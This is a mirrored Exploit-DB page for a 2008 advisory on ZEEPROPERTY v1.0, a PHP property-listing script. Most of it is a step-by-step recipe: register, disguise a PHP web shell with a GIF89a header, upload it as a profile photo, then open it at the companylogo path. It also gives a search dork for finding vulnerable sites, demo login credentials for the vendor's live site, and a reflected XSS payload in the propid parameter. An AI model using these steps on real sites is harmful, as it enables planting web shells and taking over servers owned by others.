- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7058
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6915 cve-2008-6914
- Дата публикации
- 2008-11-08
Код:
ZEEPROPERTY v1.0 remote file Upload & XSS
author: ZoRLu msn: [email protected]
home: www.z0rlu.blogspot.com
dork: "Designed & Developed by Zeeways.com"
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/companylogo/[id].php
example for demo:
user: zeeways
passwd: testing:
change profile direckt link: http://www.zeeproperty.com/viewprofile.php
and your_shell link:
http://www.zeeproperty.com/companylogo/5622365.php
XSS for demo:
http://www.zeeproperty.com/view_prop_details.php?propid="><script>alert()</script>
thanks: str0ke & yildirimordulari.org & darkc0de.com
# milw0rm.com [2008-11-08]
- Источник
- www.exploit-db.com